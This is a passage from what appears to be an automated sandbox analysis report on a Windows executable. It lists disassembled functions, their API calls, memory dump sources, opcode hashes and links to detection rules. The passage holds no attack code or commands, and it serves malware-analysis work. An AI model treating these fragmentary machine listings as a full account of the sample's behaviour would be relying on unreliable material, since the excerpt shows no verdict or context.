                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$From$AllocDialogFreeProgRectWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 704962466-0
                                                                                                                                              • Opcode ID: b6569829184fb42d57513ac240686ddfc2199f8f1beda4693de8370a87d1c167
                                                                                                                                              • Instruction ID: b945ffafd8d0b2f29bc3912b9e04def262169b811155d546c73b7a037650a840
                                                                                                                                              • Opcode Fuzzy Hash: b6569829184fb42d57513ac240686ddfc2199f8f1beda4693de8370a87d1c167
                                                                                                                                              • Instruction Fuzzy Hash: 85B1397190021ADFCB04DFA5D884AEEB7B4FF08304F10463AE819A7391D778A955CFA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041F78D Relevance: 9.2, APIs: 6, Instructions: 168COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetStringTypeW.KERNEL32(00000001,0043A9D4,00000001,?,0043B460,00000024,0041C7B7,00000001,00000100,00000001,00000000,00000000,?,?,?,004175A9), ref: 0041F7B1
                                                                                                                                              • GetLastError.KERNEL32(?,?,004175A9,?,00000000,00000008), ref: 0041F7C3
                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000100,?,?,0043B460,00000024,0041C7B7,00000001,00000100,00000001,00000000,00000000,?,?,?,004175A9), ref: 0041F7ED
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000100,?,00000000,00000000,00000000,00000000,0043B460,00000024,0041C7B7,00000001,00000100,00000001,00000000,00000000), ref: 0041F845
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000100,00000000,?,00000000,00000000,00000000), ref: 0041F8C8
                                                                                                                                              • GetStringTypeA.KERNEL32(?,?,?,00000000,?), ref: 0041F95A
                                                                                                                                                • Part of subcall function 0041D4E0: HeapAlloc.KERNEL32(00000008,?,0043B1F8,00000010,00419D17,00000001,00000088,?,00418843,?,?,?,0041540F,00000004,0043A458,0000000C), ref: 0041D562
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1390108997-0
                                                                                                                                              • Opcode ID: b1f97acda3f09c8697856c99fe5127e31a16a89ed682065aa7c50ce2c0f9515f
                                                                                                                                              • Instruction ID: a57df6695b7da8b7aa1c592e969f3bb102772f76e478128afaf792e3acbf193c
                                                                                                                                              • Opcode Fuzzy Hash: b1f97acda3f09c8697856c99fe5127e31a16a89ed682065aa7c50ce2c0f9515f
                                                                                                                                              • Instruction Fuzzy Hash: 40517F71910219EBCF21AFA5DC45AEE7BB4FF05764B60413BF814A2260C3388996DB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025856DA Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 155memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025857F5
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 025858DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02585969
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860D2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 02586105
                                                                                                                                              Strings
                                                                                                                                              • falsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,, xrefs: 02585890
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: falsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,
                                                                                                                                              • API String ID: 3298025750-2845428148
                                                                                                                                              • Opcode ID: 653e2d8ae5676c7c9899519fb57515c4b15f1185e29f8fc06a1dfaab56c20e4e
                                                                                                                                              • Instruction ID: 93a522d8998648034d52de4074a3eb86cc062da7caddb852b3b5f59fb0937f4c
                                                                                                                                              • Opcode Fuzzy Hash: 653e2d8ae5676c7c9899519fb57515c4b15f1185e29f8fc06a1dfaab56c20e4e
                                                                                                                                              • Instruction Fuzzy Hash: 7B6114B1904301DFDB25EF20D884B9A7BE6BF84304F448869DC49AF259EB719845CF5A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041B200 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetStringTypeW.KERNEL32(00000001,0043A9D4,00000001,?,0043A9D8,0000001C,00417C5C,00000001,00000020,00000100,?,00000000), ref: 0041B224
                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B236
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000000,00417F33,00000000,00000000,0043A9D8,0000001C,00417C5C,00000001,00000020,00000100,?,00000000), ref: 0041B298
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00417F33,?,00000000), ref: 0041B316
                                                                                                                                              • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 0041B328
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3581945363-0
                                                                                                                                              • Opcode ID: 9575601df985ec698041be843986eb33e77f2bc8172fa7f9b26e48780cd960a8
                                                                                                                                              • Instruction ID: 9f9fa65cc8421391b8d21a05cfa14ba1f88a212ef66fffe92425adc452bd7f2d
                                                                                                                                              • Opcode Fuzzy Hash: 9575601df985ec698041be843986eb33e77f2bc8172fa7f9b26e48780cd960a8
                                                                                                                                              • Instruction Fuzzy Hash: 7C419271900618EBCB218F55DC45AEF3B75FF49760F15012AFC20A62A0C739C9A1CBE9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042B8F8 Relevance: 9.1, APIs: 6, Instructions: 80memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(0044AED8,00000000,?,00000000,0042BB47,?,00000000,?,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B8FF
                                                                                                                                              • EnterCriticalSection.KERNEL32(0044AEF4,00000010,?,00000000,0042BB47,?,00000000,?,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B948
                                                                                                                                              • LeaveCriticalSection.KERNEL32(0044AEF4,?,00000000,0042BB47,?,00000000,?,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B95B
                                                                                                                                              • LocalAlloc.KERNEL32(00000000,00000003,?,00000000,0042BB47,?,00000000,?,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B972
                                                                                                                                              • LocalReAlloc.KERNEL32(?,00000003,00000002,?,00000000,0042BB47,?,00000000,?,?,?,?,0042B380,00429E06,0040C70D), ref: 0042B984
                                                                                                                                              • TlsSetValue.KERNEL32(0044AED8,00000000), ref: 0042B9BB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4117633390-0
                                                                                                                                              • Opcode ID: 425f8b4d3ef0bcdaa6e9ca825a8bff2006c201a408e1851a73cd36e6840e37b7
                                                                                                                                              • Instruction ID: a6b77f6463ff9e4dcbf2f81cc0fabf44c3931403c77961276365c9ec7d0f809c
                                                                                                                                              • Opcode Fuzzy Hash: 425f8b4d3ef0bcdaa6e9ca825a8bff2006c201a408e1851a73cd36e6840e37b7
                                                                                                                                              • Instruction Fuzzy Hash: E2215CB1600622EFC324DF65E884C26B7E8FF48310790893EE55AC3610D734EC95CBA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004292DB Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0042930D
                                                                                                                                              • GetParent.USER32(?), ref: 0042931B
                                                                                                                                              • GetParent.USER32(?), ref: 0042932E
                                                                                                                                              • GetLastActivePopup.USER32(?), ref: 0042933D
                                                                                                                                              • IsWindowEnabled.USER32(?), ref: 00429352
                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00429365
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 670545878-0
                                                                                                                                              • Opcode ID: 1a1af78537e06c800fa254dbed7e3f0734006fd546e1ad9da5c44e88e9679358
                                                                                                                                              • Instruction ID: 80255c199b8a0bdecbbc8602bee05c6d705c4b7d3c7af4284fa55a0f5ebffd36
                                                                                                                                              • Opcode Fuzzy Hash: 1a1af78537e06c800fa254dbed7e3f0734006fd546e1ad9da5c44e88e9679358
                                                                                                                                              • Instruction Fuzzy Hash: B011A332B0123157C631AA6A7C44B6BB2AC9F6DB60FD50177ED04D3391DB68CC02469D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00428DBA Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 00428DC9
                                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00428DDD
                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00428DEB
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00428DFD
                                                                                                                                              • PtInRect.USER32(?,?,?), ref: 00428E0D
                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 00428E1A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1315500227-0
                                                                                                                                              • Opcode ID: bddc417178efcb5005f3e382842a7ec5c5d359559d9cbc29fe9ccca2d6545a96
                                                                                                                                              • Instruction ID: 86bcff5dc365ccf3970e8e5ad6cd2e1a487aebd333d05296c5cf9a855bdfcbb6
                                                                                                                                              • Opcode Fuzzy Hash: bddc417178efcb5005f3e382842a7ec5c5d359559d9cbc29fe9ccca2d6545a96
                                                                                                                                              • Instruction Fuzzy Hash: 46014F36301229ABDB21AF54AC08EAF3B78AF55B51FC14039FD11D6164DB3499168A98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040E4FD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116comstringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetObjectA.GDI32(0040D840,0000003C,?), ref: 0040E574
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0040E585
                                                                                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 0040E5F9
                                                                                                                                              • OleCreateFontIndirect.OLEAUT32(00000020,0043B660,?), ref: 0040E625
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectObjectlstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2354491011-3916222277
                                                                                                                                              • Opcode ID: 9d852aacc324d793c307b9bc4f5cb1ae80cc7621a4b1ed0e7d4aaa0040eccceb
                                                                                                                                              • Instruction ID: 28e09a9122b547e86938a5d239e18cad7ca67ec09992f0ac5eed7e9960d5d504
                                                                                                                                              • Opcode Fuzzy Hash: 9d852aacc324d793c307b9bc4f5cb1ae80cc7621a4b1ed0e7d4aaa0040eccceb
                                                                                                                                              • Instruction Fuzzy Hash: 32417A71E00219EFCB20DFA6D885AEEBBB4BF18308F50452EE415E3291E7789A45CF54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042A65A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0042A71B
                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0042A735
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,Software\), ref: 0042A74F
                                                                                                                                              • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 0042A765
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseEnumOpenQueryValue
                                                                                                                                              • String ID: Software\
                                                                                                                                              • API String ID: 3984146545-964853688
                                                                                                                                              • Opcode ID: 9845bd2fcb0797600897e3fcf3e96c38015a830924c55a3160526b0b273f9273
                                                                                                                                              • Instruction ID: 60a233a4efbdb4d877ad5cbd16216c248d17419bcb0c5f4008330a88f52c4ae4
                                                                                                                                              • Opcode Fuzzy Hash: 9845bd2fcb0797600897e3fcf3e96c38015a830924c55a3160526b0b273f9273
                                                                                                                                              • Instruction Fuzzy Hash: 3341A031A00119ABCF11DBA0DC85EEFB7B9FF88304F50012AF511B3291DB389A15CB69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00424887 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 0042493D
                                                                                                                                              • GetWindowLongA.USER32(?,000000FC), ref: 0042494F
                                                                                                                                              • GetWindowLongA.USER32(?,000000FC), ref: 00424960
                                                                                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 0042497C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                                                              • String ID: (
                                                                                                                                              • API String ID: 2178440468-3887548279
                                                                                                                                              • Opcode ID: e0b753035cb70a9a5eef04e921d7a8f31782a4019434a00ab1b1827a1127cb12
                                                                                                                                              • Instruction ID: 3707caef856736254b48c76daa378133d04f0dbce0ae591b3731a783b4f3e6c9
                                                                                                                                              • Opcode Fuzzy Hash: e0b753035cb70a9a5eef04e921d7a8f31782a4019434a00ab1b1827a1127cb12
                                                                                                                                              • Instruction Fuzzy Hash: A531D2747006209FCB20BF79E884A6BB7B4FF84314F94062EE54197791DB78E845CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025CD340 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32), ref: 025CD3E5
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 025CD3F5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: GetSystemTimePreciseAsFileTime$Invalid$kernel32
                                                                                                                                              • API String ID: 1646373207-2690871627
                                                                                                                                              • Opcode ID: db2df966f530ecf27efd42f2e3b42c249f3b630e81deea6c47e8ff89f1a37244
                                                                                                                                              • Instruction ID: 3251ea4002ff243af219edb590f8c58f21d809fe1551ea6b6b2aa7ed5ec10e9e
                                                                                                                                              • Opcode Fuzzy Hash: db2df966f530ecf27efd42f2e3b42c249f3b630e81deea6c47e8ff89f1a37244
                                                                                                                                              • Instruction Fuzzy Hash: 0011B2B1B403009FD30C9F59898871A7BF6BB84785F5AC82DD80ED7350E375A884CB95
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00422A0B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00422A4C
                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00422A6B
                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00422A76
                                                                                                                                              • SendMessageA.USER32(?,00000111,00000002,00000000), ref: 00422A8C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
